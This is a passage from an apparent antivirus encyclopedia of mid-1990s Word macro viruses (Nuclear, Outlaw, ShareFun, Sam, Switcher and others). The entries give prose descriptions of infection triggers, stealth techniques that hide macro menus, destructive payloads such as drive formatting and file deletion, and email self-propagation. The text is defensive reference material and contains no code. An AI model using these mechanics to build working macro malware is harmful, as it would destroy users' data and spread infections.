The second payload, upon printing a document, Nuclear
checks the system time and in case of a value larger than 55
in the seconds field, it adds the following text at the end of
the printed document:
" And finally I would like to say: "
" STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC "
The third destructive payload is activated on April 5, when
Nuclear deletes the system files "C:\IO.SYS", "C:\MSDOS.SYS" and
"C:\COMMAND.COM.
This leaves the computer unbootable.
[Word.Nuclear.B]
Virus name: Word.Nuclear.B
Virus Type: Word macro virus
Number of macros: 7
Encrypted: Yes
Macro names: AutoExec, AutoOpen, FilePrint, FilePrintDefault,
FileSaveAs, InsertPayload, Payload
Size of macros: 3458 Bytes
Place of origin: France
Date of origin: March 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
The difference between this new variant and the Nuclear.A
virus is that Nuclear.B does not try to drop the "PH33r" virus.
For more information, please refer to the Nuclear.A description.
[Word.Outlaw.A]
Virus name: Word.Outlaw.A
Virus Type: Word macro virus
Number of macros: 3
Encrypted: No
Macro names: randomly selected
Size of macros: 21410 Bytes
Place of origin: Germany
Date of origin: September 1996
Payload: Yes
Common In-The-Wild: No
Description:
Outlaw has 3 unencrypted macros with a size of 21410 Bytes.
Each macro name consists of 5 characters made of: 2 letters (A-X)
corresponding to the hour field of the time and 4 randomly selected
numbers.
Outlaw redefines built-in macro commands. One macro is
associated with the letter " E " and another macro with the
"spacebar." Since both keys are very common, the probability
of an infection is very high. Outlaw is considered the first
(semi) polymorphic virus, since it changes its macro names.
Outlaw modifies the "Int1" section of Win.ini (Windows
directory). It puts the three random macro names under
Name=, Name1= and Name2=. This modification is used for
recognition of an already infected global template. Outlaw
does not infect the global template if the macro names,
mentioned in Win.ini (Name=xxxxxx), already exist.
It also modifies the following 3 document variables:
VirName
VirNameDoc
VirNamePayload
Outlaw.A does not infect a document if the value of the
VirNameDoc variable already exists in a document.
Upon infection of a document on January 20, Outlaw
launches its payload (works only under Windows 95).
It plays a laughing sound on the PC speaker and creates a
new document with the following text:
" You are infected with "
" Outlaw "
" A virus from Nightmare Joker. "
[Word.Outlaw.B]
Virus name: Word.Outlaw.B
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: randomly selected
Size of macros: 21434 Bytes
Place of origin: Germany
Date of origin: September 1996
Payload: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Outlaw.A virus is that Outlaw.B has three encrypted macros
while the macros in Outlaw.A are unencrypted.
For more information, please refer to the Outlaw.A description.
[Word.Outlaw.C (a.k.a MoonRaider)]
Virus name: Word.Outlaw.C (a.k.a MoonRaider)
Virus Type: Word macro virus
Number of macros: 5
Encrypted: Yes
Macro names: Random names
Size of macros: 14806 Bytes
Place of origin: Germany
Date of origin: November 1996
Payload: Yes
Seen In-The-Wild: No
Description:
Outlaw.C is a combination of the Outlaw.A and Magnum
viruses. It uses assigned keys to start up its macros. One of the
macros is associated with pressing SPACE, the other with
pressing "e."
ToolsMacro and ExtrasMakro are the two fixed virus macros.
Outlaw.C replaces "Tools/Macro" and "Extras/Makro" with its
own code in order to make recognition of an infected file
more difficult (called macro stealth technique).
The remaining 3 macro names are randomly chosen. Each
name consists of characters: the first 2 letters correspond to
the hour field of the infection time and the next 4 characters
are randomly selected numbers.
Outlaw.C stores its macro names in the document variables:
VirName, VirNameDoc, and VirNamePayLoad.
For the global template it uses the [intl] section of win.ini to
store it macro names: Name1=, Name2=, and Name3=.
Upon pressing the "E" key on October 10th of each year a
document with the following text is created:
" You are infected with the MooNRaiDer Virus! "
" Greetings to all members of Vlad! "
" I hope that's not the end! "
" The scene would be to boring without this very good group! "
" Nightmare Joker "
On any other day of the year, Outlaw.C checks the
"Goodbye" setting in the "Vlad" section of win.ini. If it is not
"Yes" then a DOS based virus (written by the Australian virus
writing group VLAD) is dropped and an extra line is added to
C:\AUTOEXEC.BAT to execute the virus.
The hidden filename of the DOS-based virus is "goodbye.com."
[Word.Oval.A]
Virus name: Word.Oval.A
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 339 Bytes
Place of origin: Texas, USA
Date of origin: April 1997
Payload: Yes
Seen In-The-Wild: Yes
Description:
Oval.A infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
When Oval triggers, it changes the font size (probability of 10
percent) of the active document. It also shows the following
message in the status bar:
" Be sure to drink your Ovaltine "
[Word.Paper.A]
Virus name: Word.Paper.A
Virus Type: Word macro virus
Number of macros: 5
Encrypted: No
Macro names: mswFS, FileClose, AutoOpen, ToolsMacro,
AutoExec, FieSave, mswFC, mswAO
Size of macros: 3608 Bytes
Place of origin: Unknown
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: No
Description:
When Paper infects a document, or the global template, it
copies all its virus macros and then renames them. If the
"AutoOpen" and "FileClose" macros already exist in the
global template, they are deleted. In a similar fashion, the
"FileSave" macro is deleted from documents.
Paper replaces the Tools/Macro option with a dummy macro in
order to make recognition of an infected file more difficult
(called macro stealth technique). If a user selects the
Tools/Macro option nothing happens.
[Word.PayCheck.A]
Virus name: Word.PayCheck.A
Virus Type: Word macro virus
Number of macros: 7
Encrypted: Yes
Macro names: AutoExec, AutoOpen, FileOpen, FileSave
FileSaveAs, ShellOpen, ToolsMacro
Size of macros: 8489 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: Yes
Common In-The-Wild: Yes
Description:
Paycheck infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are saved.
It uses "ToolsMacro" to make recognition of an infected
document more difficult (called macro stealth technique).
It also checks the system time and in case of a 25, 26, 27, 28,
29, 30 or 31 in the day field, it displays the following message:
" Sekarang adalah tanghal 25, sudahkah anda mengabil gaji? "
" He..he..selamat. Kalau bisa, lebih keras lagi kerjany a. "
" Bravo Bukit Asam!!! "
When a user saves a document between the 20th and the 31st
of each month, Paycheck displays another message:
" Internal error was occurred in module UNIDRV.DLL. "
" Your application may not be work normally. "
" Please contact Microsoft Product Support. "
[Word.Phantom.A (a.k.a Teaside, Guess, HiSexy)]
Virus name: Word.Phantom.A (a.k.a Teaside, Guess, HiSexy)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 1126 Bytes
Place of origin: Germany
Date of origin: May 1996
Destructive: Yes
Common In-The-Wild: No
Description:
When an infected document is opened, Guess checks if the
document variables are set to "populated." If this is not the
case, a new global template (normal.dot) is created and the
virus macro "AutoOpen" is copied into the new document.
After that the variables are set to "populated" in order to mark
the file as "infected." If the variables are already set, the virus
infects the new document by transferring the "AutoOpen" macro using
the MakroCopy command. Guess is the first macro virus to use the
document variables as a checking mechanism for already infected
documents.
Because of an error inside the virus code, the virus does not
replicate properly.
Upon a random number (between 0 and 100), Guess activates
various destructive payloads. It changes the active font size or
creates a new document including the following text:
" The word is out. "
" The word is spreading... "
" The Phantom speaks... "
" Sedbergh "
" is CRAP "
" The word spreads... "
The text will then be printed out.
The following texts will be inserted into the active document
upon a calculated random number:
" This school is really good. NOT "
" We all love Mr. Hirst. "
" M.R.Beard "
" This network is REALLY fast. "
" Hi Sexy! "
" Who's been typing on my computer? "
" Well helloooo there! "
" Guess who? "
[Word.Phardera.A (a.k.a. Phandera)]
Virus name: Word.Phardera.A (a.k.a. Phandera)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: FileOpen
Size of macros: 1673 Bytes
Place of origin: Batavia, Indonesia
Date of origin: July 1996
Destructive: Yes
Common In-The-Wild: No
Description:
Phardera activates when an infected document is opened
(FileOpen).
Phardera will not infect the global template or documents if
one of the following macros is already present:
"FileOpen"
"ToolsCustomizeMenus"
"ToolsOptionsSave"
"ToolsOptionsGeneral"
Phardera tries to hide its presence by removing Tools/Macro,
Tools/Customize and File/Templates from the options menu
(called macro stealth technique). This part of the virus works
only with the English version of Microsoft Word.
Upon infection of a document on the 13th of each month,
Phardera displays the following message:
" Dianita DSR. [I Love Her!] "
A second message is displayed when a document is infected
on the 31st of each month.
" Phardera was here! "
[Word.Polite.A(a.k.a. WW2Demo)]
Virus name: Word.Polite.A (a.k.a. WW2Demo)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: No
Macro names: FileClose, FileSaveAs
Size of macros: 1918 Bytes
Place of origin: USA
Date of origin: March 1996
Destructive: No
Common In-The-Wild: No
Description:
Polite was first created with Microsoft version 2.0, yet it also
works with higher versions of Microsoft Word.
Polite can be called a demonstration virus and is very unlikely
to spread. Before each infection attempt, it displays a
window with the following question:
" Shall I infect the file ? "
If the user answers with the "No" button, no document
gets infected. While it asks for permission to infect files,
it does not ask for permission to infect the global template
(NORMAL.DOT).
Upon infection of the global template (when an infected
document is closed), Polite displays the following message:
" I am alive! "
Once Polite infects a Word 6.0/7.0 document it can not infect
Word 2.0 documents anymore.
[Word.Random.A (Intended)]
Virus Type: Word macro virus
Virus name: Word.Random.A (Intended)
Number of macros: 1 or more
Encrypted: No
Macro names: randomly chosen
Size of macros: 553 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: No
Seen In-The-Wild: No
Description:
Random.A is another macro virus that does not infect
any other documents. Therefore, it is highly unlikely that
users will run into a document infected with this virus.
[Word.Randomic.A]
Virus name: Word.Randomic.A
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: polymorphic
Size of macros: 2397 Bytes
Place of origin: Germany
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Randomic infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when the user presses a randomly chosen key (which
is linked to the viral macro).
The two document variables that keep the name of the macro and
the key shortcuts are:
" RANDOMIC "
" TKEY "
Randomic also displays a message on April 4th and tries to exit
Windows.
[Word.Rapi.A]
Virus name: Word.Rapi.A
Virus Type: Word macro virus
Number of macros: 7 or 11 (global template)
Encrypted: No
Macro names: RpAe, RpFO, RpFS, RpTC, RpTM, RpFSA, AutoOpen
Size of macros: 6172 Bytes or 11228 Bytes
Place of origin: Indonesia
Date of origin: December 1996
Destructive: No
Common In-The-Wild: Yes
Description:
Rapi infects the global template when an infected document
is opened (AutoOpen). Further documents become infected
when they are opened (FileOpen) or saved (FileSave and
FileSaveAs).
Upon infection, Rapi displays the following message:
" Thank's for joining us ! "
The "AutoExec" macro contains a destructive payload to
delete files, yet due to some REM's it never triggers.
However, Rapi.A drops a file (C:\BACALAH.TXT) to the root
directory.
The file contains the following Indonesian text:
(translated into English)
" Assalamualaikum..., sorry @Rapi.Kom disturbs you. This message "
" was originally called PESAN.TXT. It appears in the root directory "
" after running Word 6.0 and the global template (normal.dot) is "
" already infected by this macro. This macro virus (before the change "
" by Rapi@Kom) cam from a Word 6.0 file (*.doc) which was already "
" infected by this virus. When the file is opened (Open doc), the "
" macro automatically executes the instructions i.e. "
" copies itself to the global template (normal.dot). On a certain "
" date and time the macro will delete all files in the directory "
" levels 1, 2, and 3 (except for hidden directories........ "
" Malang (date and time of infection) @Rapi.Kom "
Rapi uses "ToolsMacro" and "ToolsCustomize" to make
recognition of an infected file more difficult (called macro
stealth technique). If a user selects one of the two options,
Word displays a WordBasic error message.
Rapi.A devolves into Rapi.A1 and Rapi.A2, which contain 6
or 3 macros (5607 Bytes or 3626 Bytes).
[Word.Rapi.AA2]
Virus name: Word.Rapi.AA2
Virus Type: Word macro virus
Number of macros: 3 or 5 (global template)
Encrypted: No
Macro names: RpAe, RpFS, AutoOpen
Size of macros: 4626 Bytes or 8571 Bytes (global template)
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Common In-The-Wild: Yes
Description:
Rapi.AA2 infects the global template when an infected
document is opened (AutoOpen). Further documents become
infected when they are saved (FileSave).
Rapi.AA was discovered in its last devolved form,
thus it was named Rapi.AA2.
The main difference between this virus and the previous Rapi viruses
is that the "RpAe" macro is corrupted.
Microsoft Word does not care about corrupted macros, therefore
Rapi.AA2 is still able to infect further documents.
[Word.Reflex.A (a.k.a RedDwarf)]
Virus name: Word.Reflex.A (a.k.a RedDwarf)
Virus Type: Word macro virus
Number of macros: 3 or 4
Encrypted: Yes
Macro names: AutoOpen, FClose, FileClose, FA
Size of macros: 897 Bytes in .doc files
1226 Bytes in global template
Place of origin: Ireland
Date of origin: Summer 1996
Destructive: No
Common In-The-Wild: No
Description:
An infected global template contains one more macro ("FA").
Upon infection, Reflex turns off the prompting of Word to
ensure a hidden infection of the global template (normal.dot).
Infected documents are saved with the password "Guardian."
Reflex was written at an anti-virus conference after an
anti-virus company announced a challenge to hackers to
break its new technology. Any author of a new undetected
macro virus was supposed to receive champagne as a reward.
When Reflex infects a file it displays the following window:
" Now, Where's that Jerbil of Bubbly? "
[Word.Sam.A:Tw]
Virus name: Word.Sam.A:Tw
Virus Type: Word macro virus
Number of macros: 7 or 4
Encrypted: Yes
Macro names: AutoOpen, Autoexec, AutoNew, FileSaveAs (ToolsMacro,
FileTemplates, Monday)
Size of macros: 4192 or 6082 Bytes
Place of origin: Taiwan
Date of origin: Spring 1997
Destructive: Yes
Seen In-The-Wild: No
Description:
Sam.A is another macro virus that only works with the
East Asian version of Microsoft Word. Sam infects the global
template when an infected document is opened. Further
documents become infected when they are also opened,
created, or saved (FileSaveAs).
Sam has various destructive payloads:
1. Every Monday at 10:00, Sam overwrites the AUTOEXEC.BAT
file with commands that will format the hard disk upon
the next boot-up.
It also displays the following messages:
" Taiwan Dark Monday Today is Monday, do you work hard? "
" It's tea time now! Let's go out and have some fun... "
2. On every Monday the 13th, Sam deletes all .INI file in the
C:\WINDOWS directory and then displays the following
message:
" It Is Dark Monday... "
3. When FileTemplates is accessed, Sam shows the message
" Taiwan Dark Monday Go ahead! Make my day!!! " and
then replaces all text with the following:
" TAIWAN DARK MONDAY "
4. When ToolsMacro is accessed, Sam shows the message
" Taiwan Dark Monday You may insert password to access
here..." and encrypts the active document with the following
password:
" Samuel "
The document that was distributed over the Internet differs in
one of the macros (ToolsMacr instead of ToolsMacro). Due to
this macro name change, Sam.A devolves into Sam.A1
(with only 4 macros instead of 7). Infected samples with only
4 macros are not capable of further infecting documents.
They are classified as "intended."
[Word.Satanic.A]
Virus name: Word.Satanic.A
Virus Type: Word macro virus
Number of macros: 5
Encrypted: Yes
Macro names: AutoOpen, AutoClose, AutoExec, AutoExit, AutoNew
Size of macros: 53249 Bytes
Place of origin: Germany
Date of origin: Summer 1996
Destructive: Yes
Common In-The-Wild: No
Description:
Satanic activates when an infected document is opened
(AutoOpen). Satanic does not infect when the "AutoExit"
macro already exists in the global template or a document.
Further documents become infected when they are created
(AutoNew), closed (AutoClose) or Microsoft Word is exited
(AutoExit).
Satanic deletes the Tool/Customize, Tool/Macro and
Tools/Option menu items to make recognition of an infected
document more difficult (called macro stealth technique).
Satanic also inserts "Installed=Yes" into the "Control" section
of win.ini. If it does not find the entry (first activation or
deletion) then it tries to drop and launch a DOS-based virus
(NC.COM).
Upon exiting Microsoft Word (AutoExit) on October 1st,
Satanic will format the C drive unconditionally, resulting to
a loss of valuable information.
A second payload will activate on September 30th. Satanic
will then display the following message:
" You are infected with Satanic "
[Word.Saver.A (a.k.a. SaverSex)]
Virus name: Word.Saver.A (a.k.a. SaverSex)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: DateiSpeichern
Size of macros: 602 Bytes
Place of origin: Austria
Date of origin: September 1996
Destructive: No
Common In-The-Wild: No
Description:
Saver activates when an infected document is saved
(DateiSpeichern). It does not infect when the "DateiSpeichern"
macro already exists in the global template. The same is true
for documents.
Upon activation of the virus on April 21st the following
message will be displayed:
" Saver(SEX) written by Spooky. Austria 1996 "
[Word.ShareFun.A]
Virus name: Word.ShareFun.A
Virus Type: Word macro virus
Number of macros: 9
Encrypted: No
Macro names: AutoExec, AutoOpen, FileExit, FileOpen, FileSave
FileClose, ToolsMacro, FileTemplates, ShareTheFun
Size of macros: 1777
Place of origin: USA
Date of origin: 1997
Payload: Yes
Common In-The-Wild: Yes
Description:
ShareFun infects the global template when an infected
document is opened (AutoOpen). Further documents become
infected when they are opened (FileOpen), saved (FileSave),
closed (FileClose) or on activation of FileExit, ToolsMacro
and FileTemplates.
When an infected document is opened, the "ShareTheFun"
macro is called (probability of 25 percent) and the document
is saved to the root directory with the following name:
"Doc1.doc"
After that ShareFun looks for an active copy of MSMail.
There are two different outcomes:
1. MSMail is inactive
Result: Sharefun shuts down Windows.
2. MSMail is active
Result: Sharefun tries to take control of MSMail and sends
3 e-mail messages to 3 randomly picked names from the
address book. Attached to the e-mail message, with the
header "You have GOT to read this!", is the infected
document.
By doing this ShareFun tries to spread itself to new users.
The above payload does not always work.
ShareFun also uses "ToolsMacro" and "FileTemplates" to make
recognition of an infected document more difficult (called
macro stealth technique).
Even though ShareFun was hyped by the marketing
department of one anti-virus company, it is very unlikely that
you will become infected with this virus. It remains to be a
research virus.
[Word.ShareFun]
Virus name: Word.ShareFun
Virus Type: Word macro virus
Number of macros: 9
Encrypted: No
Macro names:
Size of macros:
Place of origin:
Date of origin: February 1997
Destructive: No
Common In-The-Wild: No
Description:
This virus has 9 macros, all of which are encrypted. This virus
uses the "ToolsMacro" to make recognition of an infected document
more difficult (called macro stealth technique).
The macros are:
"AutoExec"
"AutoOpen"
"FileExit"
"FileOpen"
"FileSave"
"FileClose"
"ToolsMacro"
"ShareTheFun"
"FileTemplates"
The AutoExec macro sets the DisableAutomacros, while AutoOpen
randomly selects, with 25% probability, to hook ShareTheFun.
The Saveall submacro copies the above macros to the global
template (NORMAL.DOT) and to the new/open document file. (Detected
by MacroTrap's rule1.)
The following describes the functions of the other macros:
1) FileExit: hooks AutoOpen's Saveall submacro
2) FileOpen: hooks AutoOpen's Saveall submacro
3) FileSave: hooks AutoOpen's Saveall submacro
4) FileClose : hooks AutoOpen's Saveall submacro
5) ToolsMacro: disables ToolsMacro and hooks AutoOpen's Saveall
submacro
6) ShareTheFun : checks whether or not the MSMail is active. If it
is, the virus hooks MSMail then sends 3 e-mail
messages to 3 randomly picked names from the
address book. Attached to the e-mail message, with
the header "You have GOT to read this!", is the
infected document.
7) FileTemplates: hooks AutoOpen's Saveall submacro
[Word.Showoff.A (Showofxx)]
Virus name: Word.Showoff.A (Showofxx)
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
Size of macros: 6789 Bytes
Place of origin: Unknown
Date of origin: Unknown
Payload: No
Seen In-The-Wild: No
Description:
Showoff infects the global template (normal.dot) when an
infected file is opened. Further documents become infected
when they are closed.
Showoff.A is most likely a corrupted "mutation" of another
variant. The "Show" macro ("AutoExec" macro after
infecting the global template) contains invalid Wordbasic
instructions. Due to those instructions, Showoff displays the
following error message when Word is started:
" Out of Memory "
Microsoft Word is not affected with garbage codes, thus the virus
is able to infect other documents.
[Word.Showoff.B (Showofxx)]
Virus name: Word.Showoff.B (Showofxx)
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
Size of macros: 7955 Bytes
Place of origin: Unknown
Date of origin: January 1997
Payload: No
Seen In-The-Wild: No
Description:
Showoff.B infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed.
The "Show" macro ("AutoExec" macro after infecting the
global template) contains invalid Wordbasic (corrupted)
instructions. Due to those instructions, Showoff displays an
error message.
Microsoft Word is not affected with corrupted macros, thus the
virus is able to infect other documents.
[Word.Showoff.C (Showofxx)]
Virus name: Word.Showoff.C (Showofxx)
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
Size of macros: 4758 Bytes
Place of origin: Australia
Date of origin: January 1997
Payload: No
Seen In-The-Wild: Yes
Description:
ShowOff.C is the original virus for the ShowOff virus family.
Most likely, other corrupted variants (such as ShowOff.A
and B) are based on its code.
ShowOff.C infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed.
Unlike other macro viruses, ShowOff.C does not contain any
destructive payloads. It only displays some messages.
[Word.ShowOff.D]
Virus name: Word.ShowOff.D
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, Show, Cfxx
Size of macros: 6789 Bytes
Place of origin: Unknown
Date of origin: February 1997
Destructive: No
Common In-The-Wild: No
Description:
The difference between this new variant and the original
ShowOff virus is that the "Show" (AutoExec in the global
template) macro is corrupted. Due to this corruption, Microsoft
Word displays the following error message when Word is started:
" Out of memory "
Even with this error, ShowOff.D is still able to spread and
infect other documents.
For more information, please refer to the ShowOff.A virus
description.
[Word.Showoff.E (Showofxx)]
Virus name: Word.Showoff.E (Showofxx)
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
Size of macros: 7955 Bytes
Place of origin: Europe
Date of origin: January 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Showoff.E infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed.
Showoff.E combines with the Bandung virus, using its destructive
"AutoExec" macro. The "Show" macro ("AutoExec" macro after infecting
the global template) contains the destructive code, which is activated
when Microsoft Word is started.
For more information, please refer to the Bandung.A virus
description.
[Word.Showoff.F (Showofxx)]
Virus name: Word.Showoff.F (Showofxx)
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, Show, Cfxx, (Ofxx, AutoClose, AutoExec)
Size of macros: 4758 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: No
Seen In-The-Wild: No
Description:
ShowOff.F infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed.
The main difference between this new variant and previous
ShowOff viruses is that ShowOff.F does not display the
following message:
" TO ONE OF US, PEACE ! HAPPY BIRTHDAY!!! "
[Word.Simple.A (Intended)]
Virus name: Word.Simple.A (Intended)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen, Simple
Size of macros: 272 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Simple.A is another macro virus that does not work properly.
It is not infectious, therefore it is very unlikely that
users will run into documents infected with this virus.
[Word.Simple.B ]
Virus name: Word.Simple.B
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen, Simple
Size of macros: 264 Bytes
Place of origin: Unknown
Date of origin: April 1997
Destructive: No
Seen In-The-Wild: No
Description:
Simple.B infects the global template when an infected
document is opened. Further documents become infected
when they are also opened (AutoOpen).
The main difference between this new variant and the older
Simple.A virus is that Simple.B is infectious and also displays
the following message:
" The Concept is Simple! "
[Word.Smiley.A]
Virus name: Word.Smiley.A
Virus Type: Word macro virus
Number of macros: 8
Encrypted: Yes
Macro names: AutoExec, AutoExit, AutoOpen, DateiSpeichern,
DateiSpeichernUnter, DateiDrucken, Timer
DateiDruckenStandard
Size of macros: 6435 Bytes
Place of origin: Germany
Date of origin: Unknown
Destructive: Yes
Seen In-The-Wild: No
Description:
Smiley is another macro virus written for the German version
of Microsoft Word.
Smiley infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are saved with the DateiSpeichern and
DateiSpeichernUnter commands.
To make recognition of an infected document more difficult,
Smiley removes the Extras/Makro and Datei/Dokumentvorlage
option (called macro stealth technique).
When Word is started (AutoExec), Smiley puts the string
"Smiley=xx" into the [windows] section of win.ini (inside the
Windows directory). "xx" represents a number.
14 days after the first infection, Smiley changes the
Tools/Options/Userinfo to the following:
" Name: Smiley Corporation "
" Initials: SC "
" Address: Greenpeace "
Furthermore, Smiley removes the following menu items:
Datei/Makro
Datei/Dokumentvorlage
Ansicht/Symbolleisten
Extras/Anpassen
56 days after the first infection, Smiley creates a new
C:\AUTOEXEC.BAT file and formats the hard drive upon the next
boot-up.
Upon Exiting Word (AutoExit), Smiley displays various
messages and adds them at the end of a printed document.
[Word.Snickers.A ]
Virus name: Word.Snickers.A
Virus Type: Word macro virus
Number of macros: 2
Encrypted: No
Macro names: AutoOpen, AutoClose
Size of macros: 420 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: Yes
Seen In-The-Wild: No
Description:
Snickers.A does not infect the global template (normal.dot)
unlike many other macro viruses. It uses a new type of infection
(called direct action). It infects documents during the following
processes:
1. An uninfected document is opened.
It becomes listed in the MRU (Most recently used) list.
2. An infected document is opened.
The virus tries to infect all the files listed in the MRU list.
Snickers has another annoying payload (AutoClose). During
infection, it encrypts the text by swapping adjacent characters.
The text is decrypted when an infected document is opened
(AutoOpen).
Virus scanners that only remove the macros will have the document
text encrypted.
[Word.Spooky.A]
Virus name: Word.Spooky.A
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: autoexec, AutoOpen, dateidokvorlagen, dateidrucken,
dateidruckenstandard, extrasmakro, DateiSpeichernUnter,
DateiOeffnen, Spooky
Size of macros: 3114 Bytes
Place of origin: Austria
Date of origin: September 1996
Payload: Yes
Common In-The-Wild: No
Description:
Spooky activates when an infected document is opened
(AutoOpen). Further documents become infected when they
are opened (DateiOeffnen) or saved (DateiSpeichernUnter).
Spooky does not infect when the "Spooky" macro already
exists in the global template (normal.dot) or a document.
Spooky disables the File/Templates and Tools/Macro menu
items in order to make recognition of an infected file more
difficult (called macro stealth technique).
If a user tries to select one of the two options he/she is prompted
for a password. Upon entering "ykoops" at the prompt in the
status bar, the original menus reappear. Entering an incorrect
password displays the following message:
" Sie haben das falsche Passwort eingegeben "
translated:
" You have entered the wrong password "
Spooky randomly displays the following message in the
status bar:
" Word.Spooky "
When a user prints out a document with the system time between
55 and 59, Spooky inserts the following text at the end
of the printout:
" Word.Spooky "
[Word.Stryx.A ]
Virus name: Word.Stryx.A
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: DateiSchliessen, DokumentSchliessen, Stryx1,
Stryx2, StryxOne, StryxTwo
Size of macros: 25669 Bytes
Place of origin: Germany
Date of origin: September 1996
Payload: Yes
Common In-The-Wild: No
Description:
While Stryx has 4 macros, some of them are only available in
the global template or in documents.
"Stryx1" (only in the global template)
"Stryx2" (only in the global template)
"StryxOne" (only in documents)
"StryxTwo" (only in documents)
Activation of Stryx occurs when a document is closed
(DateiSchliessen and DokumentSchliessen). Stryx then
modifies the "Int1" section of win.ini (Windows directory).
It sets a YES to the value of the installed init string and creates
a .GIF picture of a dragon (based on a hex dump).
Upon closing a document on December 1st, a new document
is created and the picture of the dragon is inserted. Followed
by the dragon is:
" STRYX!!!! "
" Look at your HD! :-) "
" Sorry, but it's so funny! "
" NJ 1996 "
Stryx does not infect when the "Stryx2" macro already exists
in the global template or when the "StryxTwo" macro already
exists in a document.
[Word.Surabaya.A]
Virus name: Word.Surabaya.A
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoExec, AutoOpen, Plong, FileSaveAs
ToolsMacro, FileTemplates
Size of macros: 1832 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: Yes
Description:
Surabaya infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are saved (FileSaveAs).
Surabaya uses ToolsMacro and FileTemplates to make
recognition of an infected document more difficult (called
macro stealth technique). We advise not to access the two
menu items, since they often execute the viral code. In case of
Surabaya, they display a message with " Sorry... " in it.
Whenever Microsoft Word is started from an infected global
template, the following message is displayed in the status bar:
" Lontong Micro Device ( c ) 1993 By ICE-Man "
Surabaya also adds the following text to the "Author" section of
C:\WINDOWS\WIN.INI:
" Name=TebeYe'93 The ICE-Man "
[Word.Switcher.a]
Virus name: Word.Switcher.a
Virus Type: Word macro virus
Number of macros: 10
Encrypted: Yes
Macro names: AutoExec, AutoOpen, Autoclose, FileOpen, FileSave
FileSaveAs, FileClose, FilePrint, FileTemplates,
Toolsmacro
Size of macros: 2328 Bytes
Place of origin: Unknown
Date of origin: April 1997
Destructive: Yes
Seen In-The-Wild: Yes
Description:
Switcher activates when an infected document is opened.
It uses "ToolsMacro" and "FileTemplates" to make recognition
of an infected document more difficult (called macro stealth
technique). When a user selects one of the two menu items, it
displays the following message:
" Configuration conflict - menu item is not available. "
Switcher has various destructive payloads. When Microsoft
Word is started (AutoExec), Switcher triggers (probability of
1/60) and tries to delete one of the following:
" c:\msoffice\excel\*.xls " (Microsoft Excel Spreadsheets)
" c:\access\*.mdb " (Microsoft Access database files)
" c:\msoffice\access\*.mdb " (Microsoft Access database files)
" c:\windows\*.grp " (Windows files
" c:\*.hlp " (Windows Help files)
The second payload (located in AutoClose) checks the seconds
time field and in case of a value of less than 10, it
generates two random digits and changes all instances of 1.
Example: "1" is replaced by "2" in the active document.
In addition, the following messages can be found in the "AutoExec"
macro:
" *** I'm a little pest! *** "
" The LITTLE PEST self-propagating macro is by *Sly Ellga*, "
" a guy who thinks it's funny to screw around
" with other people's data "
[Word.Swlabsl (Kit) (a.k.a. 1.0a)]
Virus Name: Word.Swlabs1 (Kit) (a.k.a. 1.0a)
Virus Type: Word macro virus
Size of executable: 117,248 Bytes
Place of origin: USA
Date of origin: January 1997
Description:
Swlabs1 is another Microsoft Word construction kit written
in Microsoft Visual C++ for Win32. It is presented as a text
editor with a virus creation wizard.
There are two ways of creating new viruses:
1. Virus source *only* if no copy of Microsoft Word is found.
2. Fully functional macro virus if Microsoft Word is found.
Swlabs1 uses the document "SKAMMY.DOC" when
communicating with Microsoft Word. It contains the macro
"Test" (2137 Bytes), which pastes the source from the
clipboard, breaks them into different macros and then exits
Word to go back to the Swlabs construction kit.
[Word.Swlabs.A (aka. Skam)]
Virus name: Word.Swlabs.A (aka. Skam)
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 512 Bytes
Place of origin: Unknown
